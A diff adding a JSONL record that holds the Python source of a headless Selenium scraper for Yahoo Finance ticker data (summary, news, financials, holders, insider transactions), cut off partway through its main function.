diff --git "a/228.jsonl" "b/228.jsonl" new file mode 100644--- /dev/null +++ "b/228.jsonl" @@ -0,0 +1,829 @@ +{"seq_id":"16443166604","text":"from selenium import webdriver\nimport pandas as pd\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom bs4 import BeautifulSoup\nimport requests\nimport lxml\nimport urllib.request as ur\nimport warnings\nimport openpyxl\nimport xlsxwriter\nimport time\nfrom selenium.webdriver.common.keys import Keys\nimport datetime\nimport numpy as np\nfrom tabulate import tabulate\nfrom varname import argname2 \nfrom pandas import DataFrame\nimport inspect\nfrom requests_html import HTMLSession\nfrom urllib.parse import urlparse\nfrom datetime import date\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n\ndef resource_path(relative_path):\n try:\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.dirname(__file__)\n return os.path.join(base_path, relative_path)\n\n# driver = webdriver.Remote(desired_capabilities=webdriver.DesiredCapabilities.HTMLUNIT)\n\n#chrome_options.add_argument('headless')\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--log-level=3')\nchrome_options.add_argument('--headless')\nchrome_options.add_argument(\"--window-size=1920,1080\")\nchrome_options.add_argument(\"--disable-extensions\")\nchrome_options.add_argument(\"--proxy-server='direct://'\")\nchrome_options.add_argument(\"--proxy-bypass-list=*\")\nchrome_options.add_argument(\"--start-maximized\")\nchrome_options.add_argument('--disable-gpu')\nchrome_options.add_argument('--disable-dev-shm-usage')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--ignore-certificate-errors')\nchrome_options.add_argument('--allow-running-insecure-content')\ndriver = webdriver.Chrome('C:\\webdriver\\chromedriver.exe',chrome_options=chrome_options)\n#driver.set_window_position(-10000,0)\n#----------------------------------------------------------------------------Summary----------------------------------------------------\n\npercent_done = 0\n\ndef Summary_Extract(Company_name_list,Company_name):\n URL_summary = \"https://finance.yahoo.com/quote/\" + Company_name\n driver.get(URL_summary)\n driver.implicitly_wait(10)\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n # if(\"lookup\" in str(driver.current_url)):\n # driver.close()\n # Company_name_list.remove(Company_name)\n # print(\"PLEASE ENTER A VALID TICKER FOR \"+str(Company_name))\n # while(1):\n # user_input = input(\"ENTER TICKER NAME (TYPE 'START' AND PRESS ENTER TO STOP READING TICKERS): \")\n # if(user_input==\"START\"):\n # break\n # Company_name_list.append(user_input)\n # print(Company_name_list)\n # main_fun(Company_name_list)\n \n \n # ## Find relevant data structures for financials\n summary_list = []\n\n # Find all HTML data structures that are divs\n for div in income_soup.find_all('td'):\n # Get the contents and titles\n summary_list.append(div.text)\n\n summary_list = list(filter(None, summary_list))\n\n summary_list_final = []\n i_summ = 0\n\n while(i_summ!=len(summary_list)):\n key = summary_list[i_summ]\n val = summary_list[i_summ+1]\n summary_list_final.append([key,val])\n i_summ = i_summ+2\n\n summary_df = pd.DataFrame(summary_list_final,columns=['Summary', 'Value'])\n\n for col in summary_df.columns[1:]: # UPDATE ONLY NUMERIC COLS \n 
try:\n summary_df[col] = summary_df[col].str.replace(',', '').astype(float)\n #print(summary_df[col])\n except:\n summary_df.loc[summary_df[col] == '-', col] = np.nan # REPLACE HYPHEN WITH NaNs\n \n #print(percent_done+=5.5)\n return summary_df\n\ndef News_Extract(Company_name):\n session = HTMLSession()\n r = session.get(\"https://finance.yahoo.com/quote/\" + Company_name + \"/news\")\n r.html.render(scrolldown = 5000)\n\n news = r.html.find('.js-stream-content',first=False)\n \n dates = []\n h3s = []\n ps = []\n urls = []\n news_list = []\n\n for i in news:\n if('simple-list-item' in str(i)):\n break\n dates.append(i.find('span')[1].text)\n h3s.append(i.find('h3')[0].text)\n ps.append(i.find('p')[0].text)\n temp = i.links\n for i in temp:\n tempurl = urlparse(\"https://finance.yahoo.com\"+str(i))\n urls.append(tempurl.geturl())\n \n for i in range(len(h3s)):\n news_list.append([h3s[i],urls[i],ps[i],dates[i]])\n\n #print(h3s,ps,urls,dates)\n\n #print(news_list)\n news_df = pd.DataFrame(news_list,columns = [\"Article Heading\",\"Article Link\",\"Article Description\",\"Article Date\"])\n #print(news_df)\n return news_df\n\ndef Press_Extract(Company_name):\n session = HTMLSession()\n r = session.get(\"https://finance.yahoo.com/quote/\" + Company_name + \"/press-releases\")\n r.html.render(scrolldown = 5000)\n\n news = r.html.find('.js-stream-content',first=False)\n \n dates = []\n h3s = []\n ps = []\n urls = []\n news_list = []\n\n for i in news:\n if('simple-list-item' in str(i)):\n break\n dates.append(i.find('span')[1].text)\n h3s.append(i.find('h3')[0].text)\n ps.append(i.find('p')[0].text)\n temp = i.links\n for i in temp:\n tempurl = urlparse(\"https://finance.yahoo.com\"+str(i))\n urls.append(tempurl.geturl())\n \n for i in range(len(h3s)):\n news_list.append([h3s[i],urls[i],ps[i],dates[i]])\n\n #print(h3s,ps,urls,dates)\n\n #print(news_list)\n press_df = pd.DataFrame(news_list,columns = [\"Article Heading\",\"Article Link\",\"Article Description\",\"Article Date\"])\n #print(press_df)\n return press_df\n\n \n#----------------------------------------------------------------------------Statistics part----------------------------------------------------\n\ndef Statistics_Extract(Company_name):\n URL_stat = \"https://finance.yahoo.com/quote/\" + Company_name + \"/key-statistics\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n\n html = driver.execute_script('return document.body.innerHTML;')\n\n\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n # ## Find relevant data structures for financials\n stats_list = []\n\n # Find all HTML data structures that are divs\n for div in income_soup.find_all('td'):\n # if(div.find('span')):\n # #print(div.find('span').text)\n # td_list.append([div.find('span').text,div.string])\n\n stats_list.append(div.text)\n # print(div.text)\n # Prevent duplicate titles\n # if not div.string == div.get('title'):\n # td_list.append(div.get('title'))\n\n\n #td_list = list(filter(None, td_list))\n #print(td_list)\n\n stats_list_final = []\n i = 0\n\n while(i!=len(stats_list)):\n key = stats_list[i]\n val = stats_list[i+1]\n stats_list_final.append([key,val])\n i = i+2\n\n stats_df = pd.DataFrame(stats_list_final,columns=['Statistics', 'Value'])\n\n #print(stats_df)\n return stats_df\n\n#----------------------------------------------------------------------------Historical data part----------------------------------------------------\n\ndef Historical_Extract(Company_name):\n URL_Hist = \"https://finance.yahoo.com/quote/\" + Company_name 
+ \"/history\"\n driver.get(URL_Hist)\n\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n time.sleep(3)\n html2 = driver.find_element_by_tag_name('html')\n html2.send_keys(Keys.PAGE_DOWN)\n\n WebDriverWait(driver, 10)\n time.sleep(3)\n\n Time_Period_click = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div')\n action = ActionChains(driver)\n action.click(on_element = Time_Period_click)\n action.perform()\n\n Max_Data = driver.find_element_by_xpath('//*[@id=\"dropdown-menu\"]/div/ul[2]/li[3]/button')\n action = ActionChains(driver)\n action.click(on_element = Max_Data)\n action.perform()\n\n Apply = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button')\n action = ActionChains(driver)\n action.click(on_element = Apply)\n action.perform()\n\n\n # try:\n # wait = WebDriverWait(driver, 10)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div'))\n # Time_Period_click = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div')\n # except:\n # try:\n # time.sleep(5)\n # wait = WebDriverWait(driver, 10)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div'))\n # html2.send_keys(Keys.PAGE_DOWN)\n # Time_Period_click = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div')\n # Time_Period_click.click()\n # except:\n # time.sleep(10)\n # wait = WebDriverWait(driver, 10)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div'))\n # html2.send_keys(Keys.PAGE_DOWN)\n # Time_Period_click = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div')\n # Time_Period_click.click()\n\n # time.sleep(1)\n \n # try:\n # wait = WebDriverWait(driver, 10)\n # EC.element_to_be_clickable((By.XPATH, '/html/body/div[1]/div/div/div[1]/div/div[3]/div[1]/div/div[2]/section/div[1]/div[1]/div[1]/div/div/div/div/div/ul[2]/li[4]'))\n # Max_Data = driver.find_element_by_xpath('/html/body/div[1]/div/div/div[1]/div/div[3]/div[1]/div/div[2]/section/div[1]/div[1]/div[1]/div/div/div/div/div/ul[2]/li[4]')\n # Max_Data.click()\n # except:\n # try:\n # time.sleep(5)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"dropdown-menu\"]/div/ul[2]/li[4]'))\n # Max_Data = driver.find_element_by_xpath('//*[@id=\"dropdown-menu\"]/div/ul[2]/li[4]')\n # Max_Data.click()\n # except:\n # try:\n # time.sleep(10)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"dropdown-menu\"]/div/ul[2]/li[4]/button'))\n # Max_Data = driver.find_element_by_xpath('//*[@id=\"dropdown-menu\"]/div/ul[2]/li[4]/button')\n # Max_Data.click()\n # except:\n # Historical_Extract(Company_name)\n\n time.sleep(1)\n\n startyear_str = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/div[1]/div/div/div/span').text\n startyear = startyear_str[8:12]\n\n # try:\n # time.sleep(2)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button'))\n # Apply = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button')\n # Apply.click()\n \n # except:\n # try:\n # time.sleep(5)\n 
# EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button'))\n # Apply = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button')\n # Apply.click()\n # except:\n # try:\n # time.sleep(10)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button'))\n # Apply = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button')\n # Apply.click()\n # except:\n # time.sleep(15)\n # EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button'))\n # Apply = driver.find_element_by_xpath('//*[@id=\"Col1-1-HistoricalDataTable-Proxy\"]/section/div[1]/div[1]/button')\n # Apply.click()\n\n time.sleep(3)\n today = date.today()\n endyear = today.strftime(\"%Y\")\n \n\n\n #if 5 years data then scroll till x = 150\n yeardiff = int(endyear) - int(startyear)\n\n if(yeardiff<=5):\n yeardiffscroll = 150\n elif(yeardiff>5 and yeardiff<=10):\n yeardiffscroll = 320\n elif(yeardiff>10 and yeardiff<=15):\n yeardiffscroll = 470\n elif(yeardiff>15 and yeardiff<=20):\n yeardiffscroll = 620\n elif(yeardiff>20 and yeardiff<=25):\n yeardiffscroll = 770\n elif(yeardiff>25 and yeardiff<=30):\n yeardiffscroll = 920\n elif(yeardiff>30 and yeardiff<=35):\n yeardiffscroll = 1070\n elif(yeardiff>36):\n yeardiffscroll = 2000\n\n x = 0\n while(x!=yeardiffscroll):\n html2.send_keys(Keys.PAGE_DOWN)\n x = x + 1\n\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n # Find all HTML data structures that are tds\n hist_list = []\n for div in income_soup.find_all('td'):\n hist_list.append(div.text)\n\n\n #print(hist_list)\n\n #Move all the dividends info to Dividends List and delete all the useless info in the end of the hist_list\n Dividends_hist = []\n Stock_Split = []\n #Remove dividend rows\n for i_hist,val in enumerate(hist_list):\n if(\"Dividend\" in val):\n Dividends_hist.append(hist_list[i_hist-1:i_hist+1])\n del hist_list[i_hist-1:i_hist+1]\n # print(\"Success\")\n elif(\"Stock Split\" in val):\n Stock_Split.append(hist_list[i_hist-1:i_hist+1])\n del hist_list[i_hist-1:i_hist+1]\n elif(\"*Close price adjusted for splits\" in val):\n del hist_list[i_hist:]\n\n\n #print(Dividends_hist)\n #print(hist_list)\n\n #Sort the main list Row_Wise\n hist_list_final = []\n\n\n hist_list_final = list(zip(*[iter(hist_list)]*7))\n\n #Make a dataframe of the sorted list\n hist_df = pd.DataFrame(hist_list_final,columns=['Date', 'Open','High','Low','Close*','Adj Close**','Volume'])\n for col in hist_df.columns[1:]: # UPDATE ONLY NUMERIC COLS \n try:\n hist_df[col] = hist_df[col].str.replace(',', '').astype(float)\n #print(hist_df[col])\n except:\n hist_df.loc[hist_df[col] == '-', col] = np.nan # REPLACE HYPHEN WITH NaNs\n \n Dividends_hist_df = pd.DataFrame(Dividends_hist,columns = [\"Date\",\"Dividends\"])\n Stock_Split_df = pd.DataFrame(Stock_Split,columns=['Date', 'Splits'])\n #print(hist_df)\n return hist_df,Dividends_hist_df,Stock_Split_df\n\n#----------------------------------------------------------------------------Profile-----------------------------------------------------------------\n\ndef Profile_Extract(Company_name):\n URL_stat = \"https://finance.yahoo.com/quote/\" + Company_name + \"/profile\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n \n html = driver.execute_script('return 
document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n #profile_list = []\n prof = driver.find_element_by_xpath('//*[@id=\"Col1-0-Profile-Proxy\"]/section/div[1]/div')\n profile_list = prof.text.splitlines()\n\n Descrip = driver.find_element_by_xpath('//*[@id=\"Col1-0-Profile-Proxy\"]/section/section[2]/p')\n GovtScore = driver.find_element_by_xpath('//*[@id=\"Col1-0-Profile-Proxy\"]/section/section[3]/div')\n profile_list.append(Descrip.text)\n profile_list.append(GovtScore.text)\n \n #print(profile_list)\n\n profile_df = pd.DataFrame(profile_list)\n profile_df = profile_df.transpose()\n #profile_df.columns = ['Name','Address1','Country','Phone Number','Website','Sector','Industry','Employees','Description','Governance Score (1-10, 1 being lowest risk)']\n #print(exec_data)\n\n #print(profile_df)\n\n return profile_df\n\ndef Profile_Extract2(Company_name):\n URL_stat = \"https://finance.yahoo.com/quote/\" + Company_name + \"/profile\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n \n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n exec_list = []\n\n for div in income_soup.find_all('td'):\n exec_list.append(div.text)\n\n exec_data = list(zip(*[iter(exec_list)]*5))\n\n exec_df = pd.DataFrame(exec_data,columns = [\"Name\",\"Title\",\"Pay\",\"Exercised\",\"Year Born\"])\n\n #print(exec_df)\n return exec_df\n\n#----------------------------------------------------------------------------Financials part----------------------------------------------------\n\ndef Financial_Extract(Company_name, Base_Url_Financials, Show_Type):\n urlfinancial = \"https://finance.yahoo.com/quote/\" + Company_name + \"/\" + Base_Url_Financials\n driver.get(urlfinancial)\n\n # if(Financial_Choice == 1):\n # #TO click Quarterly\n # driver.find_element_by_xpath('//*[@id=\"Col1-1-Financials-Proxy\"]/section/div[1]/div[2]/button/div').click()\n time.sleep(2)\n Expand = driver.find_elements_by_xpath('//*[@id=\"Col1-1-Financials-Proxy\"]/section/div[2]/button')[0]\n action = ActionChains(driver)\n action.click(on_element = Expand)\n action.perform()\n\n driver.implicitly_wait(20)\n\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n time.sleep(2)\n\n # ## Find relevant data structures for financials\n div_list = []\n\n flag_fin = 0\n\n # Find all HTML data structures that are divs\n for div in income_soup.find_all('div'):\n # Get the contents and titles\n\n if(div.text == \"Breakdown\"):\n flag_fin = 1\n\n if(flag_fin == 1):\n div_list.append(div.string)\n\n # Prevent duplicate titles\n if not div.string == div.get('title'):\n div_list.append(div.get('title'))\n\n\n # Filter out 'empty' elements\n div_list = list(filter(None, div_list))\n\n try:\n tuple_num_index = div_list.index(\"Total Revenue\")\n except:\n try:\n tuple_num_index = div_list.index(\"Total Assets\")\n except:\n tuple_num_index = div_list.index(\"Operating Cash Flow\")\n\n\n # Filter out functions\n div_list = [incl for incl in div_list if not incl.startswith('(function')]\n\n \n\n # # Sublist the relevant financial information\n income_list = div_list\n\n\n\n # # # Insert \"Breakdown\" to the beginning of the list to give it the proper stucture\n income_list.insert(0, 'Breakdown')\n\n for i,val in enumerate(income_list):\n if(val == \"Advertise with us\"):\n del income_list[i-1:]\n break\n\n\n # # # ## Create a DataFrame of the 
financial data\n # # # Store the financial items as a list of tuples\n\n if(Show_Type == 1):\n tuplenum = tuple_num_index+1\n elif(Show_Type == 2):\n tuplenum = tuple_num_index+1\n elif(Show_Type == 3):\n tuplenum = tuple_num_index+1\n \n income_data = list(zip(*[iter(income_list)]*tuplenum))\n\n # print(income_data)\n # time.sleep(100)\n\n # # # Create a DataFrame\n income_df = pd.DataFrame(income_data)\n #print(income_df)\n time.sleep(5)\n # # Make the top row the headers\n # headers = income_df.iloc[0]\n # income_df = income_df[1:]\n # income_df.columns = headers\n # income_df.set_index('Breakdown', inplace=True, drop=True)\n\n new_header = income_df.iloc[0] #grab the first row for the header\n income_df = income_df[1:] #take the data less the header row\n income_df.columns = new_header #set the header row as the df header\n # warnings.warn('Amounts are in thousands.')\n income_df = income_df.iloc[:, ::-1]\n\n # shift column 'C' to first position\n first_column = income_df.pop('Breakdown')\n \n # insert column using insert(position,column_name,first_column) function\n income_df.insert(0, 'Breakdown', first_column)\n for col in income_df.columns[1:]: # UPDATE ONLY NUMERIC COLS \n try:\n income_df[col] = income_df[col].str.replace(',', '').astype(float)\n #print(income_df[col])\n except:\n income_df.loc[income_df[col] == '-', col] = np.nan # REPLACE HYPHEN WITH NaNs\n\n return income_df\n\ndef Financial_Extract_Quarterly(Company_name, Base_Url_Financials, Show_Type):\n urlfinancial = \"https://finance.yahoo.com/quote/\" + Company_name + \"/\" + Base_Url_Financials\n driver.get(urlfinancial)\n\n time.sleep(2)\n\n WebDriverWait(driver, 10)\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-Financials-Proxy\"]/section/div[1]/div[2]/button/div'))\n Expand1 = driver.find_element_by_xpath('//*[@id=\"Col1-1-Financials-Proxy\"]/section/div[1]/div[2]/button/div')\n action = ActionChains(driver)\n action.click(on_element = Expand1)\n action.perform()\n time.sleep(2)\n\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"Col1-1-Financials-Proxy\"]/section/div[2]/button'))\n Expand = driver.find_elements_by_xpath('//*[@id=\"Col1-1-Financials-Proxy\"]/section/div[2]/button')[0]\n action = ActionChains(driver)\n action.click(on_element = Expand)\n action.perform()\n time.sleep(3)\n\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n\n # ## Find relevant data structures for financials\n div_list = []\n\n flag_fin = 0\n\n # Find all HTML data structures that are divs\n for div in income_soup.find_all('div'):\n # Get the contents and titles\n if(div.text == \"Breakdown\"):\n flag_fin = 1\n\n if(flag_fin == 1):\n div_list.append(div.string)\n\n # Prevent duplicate titles\n if not div.string == div.get('title'):\n div_list.append(div.get('title'))\n\n\n # Filter out 'empty' elements\n div_list = list(filter(None, div_list))\n\n try:\n tuple_num_index = div_list.index(\"Total Revenue\")\n except:\n try:\n tuple_num_index = div_list.index(\"Total Assets\")\n except:\n tuple_num_index = div_list.index(\"Operating Cash Flow\")\n \n\n # Filter out functions\n div_list = [incl for incl in div_list if not incl.startswith('(function')]\n\n\n # # Sublist the relevant financial information\n income_list = div_list\n\n\n\n # # # Insert \"Breakdown\" to the beginning of the list to give it the proper stucture\n income_list.insert(0, 'Breakdown')\n\n for i,val in enumerate(income_list):\n if(val == \"Advertise with us\"):\n del 
income_list[i-1:]\n break\n\n\n # # # ## Create a DataFrame of the financial data\n # # # Store the financial items as a list of tuples\n\n if(Show_Type == 1):\n tuplenum = tuple_num_index+1\n elif(Show_Type == 2):\n tuplenum = tuple_num_index+1\n elif(Show_Type == 3):\n tuplenum = tuple_num_index+1\n \n income_data = list(zip(*[iter(income_list)]*tuplenum))\n\n # print(income_data)\n # time.sleep(100)\n\n # # # Create a DataFrame\n income_df = pd.DataFrame(income_data)\n #print(income_df)\n time.sleep(5)\n # # Make the top row the headers\n # headers = income_df.iloc[0]\n # income_df = income_df[1:]\n # income_df.columns = headers\n # income_df.set_index('Breakdown', inplace=True, drop=True)\n\n new_header = income_df.iloc[0] #grab the first row for the header\n income_df = income_df[1:] #take the data less the header row\n income_df.columns = new_header #set the header row as the df header\n # warnings.warn('Amounts are in thousands.')\n income_df = income_df.iloc[:, ::-1]\n\n # shift column 'C' to first position\n first_column = income_df.pop('Breakdown')\n \n # insert column using insert(position,column_name,first_column) function\n income_df.insert(0, 'Breakdown', first_column)\n\n for col in income_df.columns[1:]: # UPDATE ONLY NUMERIC COLS \n try:\n income_df[col] = income_df[col].str.replace(',', '').astype(float)\n #print(income_df[col])\n except:\n income_df.loc[income_df[col] == '-', col] = np.nan # REPLACE HYPHEN WITH NaNs\n\n return income_df\n\n#-----------------------------------------------------------------------------Analysis\n\ndef Analysis_Extract(Company_name):\n URL_stat = \"https://finance.yahoo.com/quote/\" + Company_name + \"/analysis\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n\n html = driver.execute_script('return document.body.innerHTML;')\n\n\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n # ## Find relevant data structures for financials\n heading_list = []\n\n \n \n for i in income_soup.find_all('th'):\n heading_list.append(i.text)\n\n df1_heading = heading_list[0:5]\n df2_heading = heading_list[5:10]\n df3_heading = heading_list[10:15]\n df4_heading = heading_list[15:20]\n df5_heading = heading_list[20:25]\n df6_heading = heading_list[25:30]\n\n tds = []\n \n for i in income_soup.find_all('td'):\n tds.append(i.text)\n \n df1 = tds[0:25]\n df2 = tds[25:55]\n df3 = tds[55:75]\n df4 = tds[75:100]\n df5 = tds[100:120]\n df6 = tds[120:150]\n\n # df1 = df1_heading+df1\n # df2 = df2_heading+df2\n # df3 = df3_heading+df3\n # df4 = df4_heading+df4\n # df5 = df5_heading+df5\n # df6 = df6_heading+df6\n\n Earnings_DF = np.array(df1)\n Earnings_DF = np.reshape(Earnings_DF, (5,5))\n Earnings_DF = pd.DataFrame(Earnings_DF, columns=df1_heading)\n\n Rev_DF = np.array(df2)\n Rev_DF = np.reshape(Rev_DF, (6,5))\n Rev_DF = pd.DataFrame(Rev_DF, columns=df2_heading)\n\n Earning_hist_DF = np.array(df3)\n Earning_hist_DF = np.reshape(Earning_hist_DF, (4,5))\n Earning_hist_DF = pd.DataFrame(Earning_hist_DF, columns=df3_heading)\n\n EPS_DF = np.array(df4)\n EPS_DF = np.reshape(EPS_DF, (5,5))\n EPS_DF= pd.DataFrame(EPS_DF, columns=df4_heading)\n\n EPS_Rev_DF = np.array(df5)\n EPS_Rev_DF = np.reshape(EPS_Rev_DF, (4,5))\n EPS_Rev_DF = pd.DataFrame(EPS_Rev_DF, columns=df5_heading)\n\n Growth_DF = np.array(df6)\n Growth_DF = np.reshape(Growth_DF, (6,5))\n Growth_DF = pd.DataFrame(Growth_DF, columns=df6_heading)\n\n return Earnings_DF,Rev_DF,Earning_hist_DF,EPS_DF,EPS_Rev_DF,Growth_DF\n\ndef Holders_Extract(Company_name):\n URL_stat = 
\"https://finance.yahoo.com/quote/\" + Company_name + \"/holders\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n\n dfs = pd.read_html(html)[0]\n dfs1 = pd.read_html(html)[1]\n dfs2 = pd.read_html(html)[2]\n\n return dfs,dfs1,dfs2\n\n\ndef Insider_Roster_Extract(Company_name):\n URL_stat = \"https://finance.yahoo.com/quote/\" + Company_name + \"/insider-roster\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n time.sleep(10)\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n #dfs = pd.read_html(html)[0] \n\n td_list = []\n\n for i in income_soup.find_all(\"td\",{\"class\":\"Ta(end)\"}):\n td_list.append(i.text)\n\n indiv_list = []\n design_list = []\n\n for i in income_soup.find_all(\"td\",{\"class\":\"Ta(start)\"}):\n indiv_list.append(i.find(\"a\").text)\n design_list.append(i.text.replace((i.find(\"a\").text),''))\n\n # print(td_list)\n # print(indiv_list)\n # print(design_list)\n\n td_list = list(zip(*[iter(td_list)]*3))\n td_df = pd.DataFrame(td_list,columns = [\"Most Recent Transaction\",\"Date\",\"Shares Owned as of Transaction Date\"])\n\n td_df.insert(0,\"Individual or Entity\",indiv_list)\n td_df.insert(1,\"Designation\",design_list)\n\n return td_df\n\ndef Insider_Transactions_Extract1(Company_name):\n URL_stat = \"https://finance.yahoo.com/quote/\" + Company_name + \"/insider-transactions\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n\n html = driver.execute_script('return document.body.innerHTML;')\n # BeautifulSoup the xml\n income_soup = BeautifulSoup(html, 'lxml')\n dfs = pd.read_html(html)[0]\n dfs1 = pd.read_html(html)[1]\n\n #print(dfs,dfs1,dfs2)\n return dfs,dfs1\n\ndef Insider_Transactions_Extract2(Company_name):\n URL_stat = \"https://finance.yahoo.com/quote/\" + Company_name + \"/insider-transactions\"\n driver.get(URL_stat)\n driver.implicitly_wait(10)\n time.sleep(5)\n\n temp = driver.find_element_by_xpath('//*[@id=\"Col1-1-Holders-Proxy\"]/section/div[2]/div[4]/table/tbody').text.splitlines()\n temp = list(zip(*[iter(temp)]*3))\n\n td_list = []\n temp2 = []\n for i in range(1,len(temp)+1):\n for j in range(1,7):\n temp2.append(driver.find_element_by_xpath('//*[@id=\"Col1-1-Holders-Proxy\"]/section/div[2]/div[4]/table/tbody/tr['+str(i)+']/td['+str(j)+']').text)\n\n for i in temp2:\n if(\"\\n\" in i):\n ind = i.find(\"\\n\")\n ele1 = i[:ind]\n ele2 = i[ind+1:]\n td_list.append(ele1)\n td_list.append(ele2)\n else:\n td_list.append(i)\n\n td_list = list(zip(*[iter(td_list)]*7))\n\n dfs2 = pd.DataFrame(td_list,columns = [\"Insider\",\"Designation\",\"Transaction\",\"Type\",\"Value\",\"Date\",\"Shares\"])\n return dfs2\n\ndef Error_Extract():\n error_list = [\"Cannot scrape\"]\n\n df1 = pd.DataFrame(error_list)\n df2 = pd.DataFrame(error_list)\n df3 = pd.DataFrame(error_list)\n df4 = pd.DataFrame(error_list)\n df5 = pd.DataFrame(error_list)\n df6 = pd.DataFrame(error_list)\n\n return df1,df2,df3,df4,df5,df6\n \ndef Error_Extract2():\n error_list = [\"Cannot scrape\"]\n\n df1 = pd.DataFrame(error_list)\n df2 = pd.DataFrame(error_list)\n df3 = pd.DataFrame(error_list)\n\n return df1,df2,df3\n\ndef Error_Extract3():\n error_list = [\"Cannot scrape\"]\n\n df1 = pd.DataFrame(error_list)\n df2 = pd.DataFrame(error_list)\n\n return df1,df2\n\n\n#----------------------------------------------------------------------------Main 
Function---------------------------------------------------------\n\n# def namestr(obj, namespace):\n# return [name for name in namespace if namespace[name] is obj][0]\n\ndef retrieve_name(var):\n callers_local_vars = inspect.currentframe().f_back.f_locals.items()\n return [var_name for var_name, var_val in callers_local_vars if var_val is var]\n\n\n#Error in company \"BABA\" in Profile\ndef main_fun(Company_name_list,wrong_tickers):\n today = date.today()\n exceldate = today.strftime(\"%b-%d-%Y\")\n error_list = [\"Cannot scrape\"]\n \n lossy_flag = 0\n lossy_tickers = []\n for Company_name in Company_name_list:\n percent_done = 0\n try:\n Summary = Summary_Extract(Company_name_list,Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Summary = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n News = News_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n News = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Press = Press_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Press = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Statistics = Statistics_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Statistics = pd.DataFrame(error_list)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n\n try:\n Historical_Data,Dividends,Splits = Historical_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n try:\n Historical_Data,Dividends,Splits = Historical_Extract(Company_name)\n percent_done+=5.5\n print(str(percent_done)+\"% Completed\")\n except:\n Historical_Data,Dividends,Splits = Error_Extract2\n percent_done+=5.5\n 